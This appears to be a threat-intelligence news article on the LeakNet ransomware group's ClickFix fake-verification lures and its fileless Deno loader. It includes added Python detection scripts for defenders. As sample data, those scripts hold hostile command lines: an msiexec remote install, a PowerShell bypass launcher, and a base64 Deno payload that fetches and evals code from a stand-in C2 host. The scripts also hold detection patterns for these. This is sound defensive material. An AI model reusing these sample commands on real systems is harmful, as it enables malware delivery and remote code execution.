The LeakNet ransomware group is rapidly scaling its operations with two dangerous innovations: a social engineering technique called ClickFix and a previously unreported fileless loader built on the legitimate Deno JavaScript runtime.
According to ReliaQuest research, LeakNet has shifted away from purchasing stolen credentials from initial access brokers (IABs). Instead, the group now plants fake verification pages on compromised but otherwise legitimate websites, casting a much wider net for victims.
ClickFix Social Engineering: Fake Cloudflare Verification
The ClickFix technique presents victims with what appears to be a standard Cloudflare Turnstile verification check. Users are then prompted to manually run a command—often through the Windows Run dialog (Win+R)—that initiates the infection chain.
Because these lures are hosted on real websites rather than attacker-owned domains, standard network-layer defenses generate far fewer alerts. The first red flag appears only after the user has already executed the malicious command, which shifts the burden to behavioral monitoring: suspicious msiexec invocations (typically with explorer.exe as the parent, since the command is typed into the Run dialog) and unexpected outbound connections.
ClickFix has become a preferred delivery method across the threat landscape, facilitating the distribution of 59% of the top malware families tracked in 2025.
The Deno-Based Fileless Loader: BYOR Attack
The most technically dangerous component of LeakNet’s toolkit is a loader built on Deno, a legitimate JavaScript and TypeScript runtime used daily by developers.
LeakNet employs a bring-your-own-runtime (BYOR) approach: instead of deploying a custom malicious binary that might trigger security tools, the attackers install the real, trusted Deno executable on the victim’s machine and use it to run harmful code.
The loader is launched through PowerShell and VBScript files whose names follow the patterns Romeo*.ps1 and Juliet*.vbs. Rather than writing a JavaScript file to disk where it could be scanned, LeakNet passes the payload to Deno on the command line as a base64-encoded data: URL, which Deno decodes and runs entirely in memory.
The JavaScript payload itself never touches disk; the only artifacts on the endpoint are the legitimate Deno binary and the small launcher scripts, which makes the chain nearly invisible to signature-based tools that look for malicious files.
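The two tells described in the ClickFix and Deno sections (msiexec fetching a package from a URL with the Run dialog's parent process, and Deno executing a base64 data: URL that exists only in its argv) can be picked up from process-creation telemetry. The following is an added example written for this article, not code from ReliaQuest or from the LeakNet toolkit: it runs a few simple rules over constructed Sysmon-style records and decodes any data: URL it finds so an analyst can see the payload without ever writing it to disk. The sample events, hostnames and the script-host list are assumptions for illustration.

```python
import base64
import re

# Constructed Sysmon-style process-creation records (parent image, image,
# command line). They are stand-ins for real telemetry, not captured data.
PAYLOAD_JS = b'fetch("https://c2.example.test/stage2").then(r => r.text()).then(eval);'
SAMPLE_EVENTS = [
    # Win+R "verification" command: explorer.exe spawns msiexec with a remote package
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec /i https://cdn.compromised-site.example/verify.msi /qn"),
    # Launcher script with the Romeo*.ps1 naming pattern, started from a VBS host
    ("C:\\Windows\\System32\\wscript.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\RomeoUpdate.ps1"),
    # Deno fed a base64 data: URL so the JavaScript never lands on disk
    ("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "C:\\ProgramData\\deno\\deno.exe",
     "deno.exe run -A data:application/javascript;base64,"
     + base64.b64encode(PAYLOAD_JS).decode()),
    # Benign developer use of the same runtime from an editor
    ("C:\\Users\\bob\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe",
     "C:\\Users\\bob\\.deno\\bin\\deno.exe", "deno run --allow-net server.ts"),
    # Unrelated benign process
    ("C:\\Windows\\explorer.exe", "C:\\Program Files\\Git\\cmd\\git.exe", "git pull"),
]

DATA_URL_RE = re.compile(r"data:[\w/+.-]*;base64,([A-Za-z0-9+/=]+)", re.IGNORECASE)
LAUNCHER_RE = re.compile(r"(Romeo[^\\\s]*\.ps1|Juliet[^\\\s]*\.vbs)\b", re.IGNORECASE)
# Assumed set of script hosts that should not normally be spawning a JS runtime.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_data_url(cmdline):
    """Return the decoded body of a base64 data: URL in the command line, or None."""
    m = DATA_URL_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return None


def classify(parent, image, cmdline):
    """Return a list of (severity, reason) findings for one process-creation event."""
    findings = []
    name, pname = basename(image), basename(parent)

    # ClickFix: msiexec pulling a package from a URL, worse when the parent is
    # explorer.exe (what a command typed into the Run dialog looks like).
    if name == "msiexec.exe" and re.search(r"https?://", cmdline, re.IGNORECASE):
        if pname == "explorer.exe":
            findings.append(("high", "msiexec installing from a URL, parent explorer.exe (Run dialog)"))
        else:
            findings.append(("medium", "msiexec installing from a URL"))

    # BYOR: the trusted Deno binary running code that exists only inside its argv.
    if name == "deno.exe":
        payload = decode_data_url(cmdline)
        if payload is not None:
            findings.append(("high", "deno running a base64 data: URL in memory: " + payload[:48]))
        elif pname in SCRIPT_HOSTS:
            findings.append(("medium", f"deno spawned by script host {pname}"))

    # Launcher naming reported for this campaign.
    m = LAUNCHER_RE.search(cmdline)
    if m:
        findings.append(("high", f"launcher name matches reported pattern: {m.group(1)}"))
    return findings


def scan(events):
    """Map event index -> findings, dropping events with none."""
    out = {}
    for i, e in enumerate(events):
        hits = classify(*e)
        if hits:
            out[i] = hits
    return out


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        for sev, why in hits:
            print(f"event {i}: [{sev}] {why}")
```

The developer's `deno run server.ts` launched from an editor produces no finding: the point is not that Deno is bad but that a trusted runtime running code from a data: URL, or being spawned by a script host, is the behavior worth alerting on. Decoding the data: URL in the detection pipeline also gives the second-stage URL for blocking without having to recover it from memory.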
Post-Exploitation Behavior
Once the loader runs, it:
- Collects system details (username, hostname, memory size, OS version)
- Creates a unique victim fingerprint
- Connects to attacker-controlled infrastructure for a victim-specific second-stage payload
- Prevents duplicate instances by binding to a local port
- Enters a looping cycle of fetching and executing further code in memory
Defensive Recommendations
ReliaQuest recommends the following mitigations:
- Block newly registered domains — LeakNet’s C2 servers are typically only weeks old
- Restrict Win+R commands — Regular users should not be able to run arbitrary commands
- Limit PsExec — Restrict to authorized administrators through Group Policy Objects
- Monitor for jli.dll sideloading in C:\ProgramData\USOShared
- Watch for unusual outbound S3 bucket connections
- Isolate compromised hosts immediately upon detecting post-exploitation behavior
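Three of the recommendations above, together with the loader's habit of binding a local port as a single-instance lock, can be expressed as rules over network telemetry. The example below is added for this article and is not ReliaQuest's or the article's own code. It triages constructed Sysmon-style network events from one host: a Deno process listening on loopback, any connection to a domain registered within the last 30 days, and S3 bucket traffic from a process that is not on an allowlist. The domain-age table is a constructed stand-in for a WHOIS/RDAP lookup, the allowlist is assumed, and the registrable-domain helper deliberately uses the last two labels rather than the Public Suffix List.

```python
import re

# Constructed Sysmon-style network records from one host. They are stand-ins
# for real telemetry, not captured data.
SAMPLE_NET_EVENTS = [
    {"image": "deno.exe", "kind": "listen", "laddr": "127.0.0.1", "lport": 49653},
    {"image": "deno.exe", "kind": "connect", "host": "update-cdn-9f3.fresh-example.test", "port": 443},
    {"image": "powershell.exe", "kind": "connect",
     "host": "stage-assets.s3.us-east-1.amazonaws.com", "port": 443},
    {"image": "backupagent.exe", "kind": "connect", "host": "corp-backups.s3.amazonaws.com", "port": 443},
    {"image": "chrome.exe", "kind": "connect", "host": "docs.old-example.test", "port": 443},
    {"image": "nginx.exe", "kind": "listen", "laddr": "0.0.0.0", "lport": 8080},
]

# Constructed stand-in for a WHOIS/RDAP registration-age lookup, in days.
DOMAIN_AGE_DAYS = {
    "fresh-example.test": 12,
    "old-example.test": 4100,
    "amazonaws.com": 6000,
}
NEW_DOMAIN_MAX_AGE = 30  # C2 domains in this campaign are reported to be only weeks old
# Assumed organisational allowlist of processes expected to talk to S3.
S3_ALLOWED_IMAGES = {"backupagent.exe", "chrome.exe", "msedge.exe"}
# bucket.s3.amazonaws.com, s3.<region>.amazonaws.com, bucket.s3-<region>.amazonaws.com ...
S3_HOST_RE = re.compile(r"^(?:[\w.-]+\.)?s3(?:[.-][\w-]+)?\.amazonaws\.com$", re.IGNORECASE)


def registrable_domain(host):
    """Last two labels of the host. Simplification: a real tool uses the Public Suffix List."""
    return ".".join(host.lower().split(".")[-2:])


def is_s3_host(host):
    return bool(S3_HOST_RE.match(host))


def triage(event, ages=DOMAIN_AGE_DAYS):
    """Return a list of (severity, reason) findings for one network event."""
    findings = []
    image = event["image"].lower()

    if event["kind"] == "listen":
        # The loader binds a local port to stop a second instance starting; a JS
        # runtime listening on loopback outside a developer box deserves a look.
        if image == "deno.exe" and event["laddr"].startswith("127."):
            findings.append(("medium", f"deno.exe listening on loopback port {event['lport']}"))
        return findings

    host = event["host"]
    age = ages.get(registrable_domain(host))
    if age is not None and age <= NEW_DOMAIN_MAX_AGE:
        findings.append(("high", f"{image} -> {host}: domain registered {age} days ago"))
    if is_s3_host(host) and image not in S3_ALLOWED_IMAGES:
        findings.append(("medium", f"{image} -> {host}: S3 bucket traffic from non-allowlisted process"))
    return findings


def host_needs_isolation(events, ages=DOMAIN_AGE_DAYS):
    """True when any event on the host carries a high-severity finding."""
    return any(sev == "high" for e in events for sev, _ in triage(e, ages))


if __name__ == "__main__":
    for e in SAMPLE_NET_EVENTS:
        for sev, why in triage(e):
            print(f"[{sev}] {why}")
    print("isolate host:", host_needs_isolation(SAMPLE_NET_EVENTS))
```

The backup agent reaching its own bucket and the browser visiting a long-registered site produce nothing; the rules fire on the combination the article describes, a fresh domain contacted by the runtime and a script host pushing data to S3. Age-based blocking of newly registered domains belongs at the proxy or resolver; this code shows the same test applied after the fact for triage and isolation decisions.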
Why This Matters
LeakNet’s combination of mass social engineering via ClickFix and fileless execution via Deno represents a significant evolution in ransomware operations. By avoiding purchased credentials and disk-based payloads, the group shrinks the on-disk and network footprint defenders can detect while widening its reach to anyone who visits a compromised site.
Organizations relying solely on domain blocklists and file-based detection will find these attacks difficult to catch before damage occurs. Behavioral monitoring and rapid incident isolation are now critical defensive requirements.
Source: Cybersecurity News / ReliaQuest
